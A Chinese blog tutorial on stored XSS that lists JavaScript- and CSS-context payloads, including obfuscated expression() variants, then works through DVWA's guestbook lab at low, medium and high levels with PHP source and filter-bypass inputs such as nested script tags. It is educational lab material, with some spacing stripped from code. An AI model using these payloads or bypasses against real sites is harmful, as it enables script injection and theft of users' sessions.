存储型 XSS

最新推荐文章于 2024-07-30 09:06:59 发布
最新推荐文章于 2024-07-30 09:06:59 发布
阅读量294 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33777877/article/details/85094711
版权

存储型XSS

XSS***的用处

093641850.png

JS-Context存储型XSS:
1、</script>闭合当前脚本,然后输入自定义内容。

093644170.png

过滤<,>,/
替换</script>为</’+’script>(网易邮箱)
2、根据JS上下文,构造正确的闭合。

093646523.png

根据实际情况,进行过滤。通常输出是字符串,在’和"之间,过滤’,"即可

093648986.png

和<script>中的XSS一样,过滤’和"
而实际上,在HTML的属性里,&#NNN;或&#xNN;也是可以被执行的!

093650104.png

进一步构造利用代码

093653537.png

还需要将&过滤为&amp;


CSS-Context存储型XSS
除了<style>….</style>中可以被写入CSS数据之外,还有其它位置也可以:

1.
<divstyle="width:if(!window.x){alert(1);window.x=1})"></div>
<divstyle="width:ex\pression(if(!window.x){alert(1);window.x=1})"></div>
<divstyle="width:ex/**/pression(if(!window.x){alert(1);window.x=1})"></div>
<divstyle="width:express\69on(if(!window.x){alert(1);window.x=1})"></div>
<divstyle="width:express\69on(if(!window.x){alert(1);window.x=1})"></div>
<divstyle="w&#105;dth:express&#x0069;on(if(!w&#x69;ndow.x){alert(1);w&#x069;ndow.x=1})"></div>
2.
<linkrel=stylesheethref=data:,*%7bx:if(!window.x)%7balert(1);window.x=1%7d)%7d/>
3.
<style>@import"data:,*%7bx:if(!window.x)%7balert(1);window.x=1%7d)%7D";</style>
4.
<divstyle="font-family:foo}x=if(!window.x){alert(1);window.x=1});">XXX</div>
5.



下面我们在看一下在DVWA里面存储型的XSS漏洞的各种级别和代码的应用
在dvwa里存储型的xss的使用实在留言板里面实现,只需要在留言板输入利用的代码就可以


low级代码

01<?php
02
03if(isset($_POST['btnSign']))
04{
05
06$message=trim($_POST['mtxMessage']);
07$name=
trim($_POST['txtName']);
08
09//Sanitizemessageinput
10$message=stripslashes($message);
11$message=mysql_real_escape_string($message);
12
13//Sanitizenameinput
14$name=mysql_real_escape_string($name);
15
16$query="INSERTINTOguestbook(comment,name)VALUES('$message','$name');";
17
18$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
19
20}
21
22?>


我们输入
<script>alert('xss')</script>

093655215.png

093658895.png

另外有一点挺有意思,在输入name时会发现有字数的限制,但php中并没有判断name的长度
所以修改客户端html就可以删除这个限制,看代码

093701370.png

medium级代码

01<?php
02
03if(isset($_POST['btnSign']))
04{
05
06$message=trim($_POST['mtxMessage']);
07$name=
trim($_POST['txtName']);
08
09//Sanitizemessageinput
10$message=trim(strip_tags(addslashes($message)));
11$message=mysql_real_escape_string($message);
12$message=htmlspecialchars($message);
13
14//Sanitizenameinput
15$name=str_replace('<script>','',$name);
16$name=mysql_real_escape_string($name);
17
18$query="INSERTINTOguestbook(comment,name)VALUES('$message','$name');";
19
20$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
21
22}
23
24?>

这里可以看到$name的过滤比较简单,那么就从他下手,用到了str_replace()函数,这个很好绕过吧

<<script>script>alert('123');</script>

不要说有长度限制,只要修改一下客户端html在提交就可以了




high级代码

01
02
03if(isset($_POST['btnSign']))
04{
05
06$message=trim($_POST['mtxMessage']);
07$name=
trim($_POST['txtName']);
08
09//Sanitizemessageinput
10$message=stripslashes($message);
11$message=mysql_real_escape_string($message);
12$message=htmlspecialchars($message);
13
14//Sanitizenameinput
15$name=stripslashes($name);
16$name=mysql_real_escape_string($name);
17$name=htmlspecialchars($name);
18
19$query="INSERTINTOguestbook(comment,name)VALUES('$message','$name');";
20
21$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
22
23}
24
25?>


对于high级的代码,我们看到它同样使用了htmlspecialchars()函数,大家可以找方法绕过去!


文章中有许多的不足之处,XSS也无法一一都详细说明,有自己观点可以给我提出,谢谢!

weixin_33777877
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
存储XSS
weixin_45634365的博客
03-07 2592
一、XSS简介 XSS:用户输入的数据被当做代码执行 #JS代码被触发的三种情况 <script></script> <a herf=javascript:alert(1)></a> <img src=1 onerror=alert(1) /> XSS的三种类: (1)反射 (2)存储 (3)Dom 二、同源策略 浏览器的同源策略,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本
web ---- 存储 XSS
L0g1c的博客
07-23 1741
Js操纵的主体是浏览器,窃取的当然是浏览器的Cookie,所以有XSS的地方,你如果抓包改Cookie去访问,XSS是吃不到你修改过的Cookie,其实你访问的时候抓包就可以看到,第一次访问正常页面,第二次会GET传参访问XSS平台。以前也搭建过XSS平台,其实后台可以看到所有用户的Cookie,当你用了别人的XSS平台其实就要注意信息泄露这个问题,而且访问XSS平台和XSS页面建议使用无痕,天知道,他们会不会在脚本里面做手脚。...
存储XSS(Cross-Site Scripting)
最新发布
qq_69100706的博客
07-30 204
在CTF(Capture The Flag)竞赛中,存储XSS(Cross-Site Scripting)攻击是一种利用Web应用程序将恶意脚本永久存储在服务器上的漏洞。不同于反射XSS存储XSS不需要用户点击特定的链接来激活恶意脚本,因为它存储在服务器的数据库或文件系统中,并在每次请求相关的页面或数据时执行。
存储xss
weixin_42576186的博客
12-26 387
存储XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,它指的是攻击者往Web应用程序中注入恶意代码,被存储在服务器端,当其他用户浏览这些页面时,嵌入的恶意代码就会被执行。 存储XSS攻击通常发生在用户留言板、论坛和博客等功能中,攻击者可以在留言板中发布带有恶意代码的留言,当其他用户浏览留言板时就会受到攻击。存储XSS攻击也可能发生在用户提交表单时,如果Web应用程...
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
YXcms-含有存储XSS漏洞的源码包
03-17
"YXcms-含有存储XSS漏洞的源码包" 这个标题揭示了我们要讨论的核心内容。YXcms是一个内容管理系统(CMS),它不幸地包含了存储跨站脚本(Stored XSS)的安全漏洞。存储XSSXSS攻击的一种类,这种漏洞通常...
E069-web安全应用-存储XSS的场景实践.pdf
12-02
E069-web安全应用-存储XSS的场景实践 本资源讲解了存储XSS(Cross-Site Scripting)的攻击场景实践,通过DVWA(Damn Vulnerable Web Application)平台来演示整个攻击过程。 知识点1:存储XSS的定义和原理 ...
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS)漏洞。这种漏洞允许...
XSS存储xss
wwwwyyyrre的博客
06-17 3235
每当有用户访问包含恶意代码的页面时,就会触发代码的执行,从而达到攻击目的。有别于反射XSS编写一次代码只能进行一次攻击的特点,存储XSS的恶意脚本一旦存储到服务器端,就能多次被使用,称之为“持久XSS”。存储XSS比反射XSS的危害更大,在于它不需要构造特殊的URL,用户访问的是一个正常的URL也可以被攻击;另一方面,它持久化在服务端,影响的范围可以比反射XSS更广。一个重要条件是,web应用中的用户之间有一定的交互,而非各玩各的。比方说,博客、论坛等,。
XSS-存储
qq_39416206的博客
03-14 460
一、知识点 同源策略: 所谓同源:需要同 域名/host、端口、协议 存储xss是什么 提交恶意xss数据,存入数据库中,访问时触发。 存储xss可能出现的位置 可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息 获取到别人的Cookie怎么登陆别人用户 可以使用Burp抓包直接修改抓包数据,也可以使用浏览器修改Cookie,建议火狐浏览器 存储XSS怎么预防? XSS预防从两点出发,第一点不允许输入恶意字符,第二点不允许输出,都.
xss存储
xu_1234567的博客
11-04 4772
1.存储xss原理 存储xss是hacker向服务器注入一段js代码,代码存储到服务器的数据库中,每当用户访问服务器当中带有js代码的数据时,服务器将响应用户,返回给用户一个带有js代码页面 2.xss存储low级演示 1.将DVWA级别设置为低级 分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后$message使用mysql_real_escape_string函数转义SQL语句中的特殊字符,使用stripslashes函数过滤掉”\”,对$name参数中使用mysql_re
Medium.com的存储xss(未经验证的oEmbed)
热门推荐
一个码农的笔记
01-10 2万+
翻译自:https://medium.com/@jonathanbouman/stored-xss-unvalidated-embed-at-medium-com-528b0d6d4982 翻译:聂心明 你想参加私有众测?我很乐意邀请你,请联系我Jonathan@Protozoan.nl 背景 在我的上一篇文章中,你可以了解到很多关于反射xss的。下面的这个攻击就可以欺骗用户去访问一个准备好的u...
DVWA通关--存储XSSXSS (Stored))
箭雨镜屋
07-16 6802
LOW 通关步骤 源码分析 MEDIUM 通关步骤 源码分析 HIGH 通关步骤 源码分析 IMPOSSIBLE 源码分析 总结
网络安全:存储XSS
垃圾管理员的垃圾站
09-08 7056
书接上文(有没有一种熟悉的味道),来看存储XSS,这个最常见,也最好理解。 数据库里的一条数据显示了出来。 我们输入一些东西,下方又会多出来一条数据: 如果重新加载页面,仍旧有这两条数据。这就是存储,输入数据会被存入数据库,网页每次被打开,都会从数据库里调出显示。 这个像什么?对,就是我们文章下面的评论系统,文章所有的评论会被存进数据库,每一个浏览...
存储xss_安全测试之XSS
weixin_39989159的博客
11-29 1637
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
DVWA--存储XSS(初中高)
firecjh的博客
06-09 558
选择“View Source”查看源程序,发现服务器端对message框内容使用了htmlspecialchars() 函数进行转义,对name框使用str_replace()函数进行替换。选择“View Source”查看源程序,对message参数进行html转义外,还对name参数使用preg_replace()函数进行替换,不能使用常用的绕过方法。2)在界面出现弹框,弹框内容为本人姓名拼音。2)在界面出现弹框,弹框内容为本人姓名拼音。3) 刷新页面,查看是否再次出现弹框,比较与反射XSS的区别。
存储XSS简介
seek_2022的博客
05-05 1万+
文章目录一、存储XSS简介(一)存储XSS的概念(二)存储XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储XSS简介 (一)存储XSS的概念 存储XSS又称持久XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
深入理解存储XSS:成因、挖掘与防护
"这篇文档详细介绍了存储XSS(Cross-Site Scripting)的成因、挖掘方法以及其潜在的危害和攻击方式。" 在网络安全领域,XSS攻击是一种常见的Web应用安全漏洞,它允许攻击者在用户的浏览器上执行恶意脚本。XSS分为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值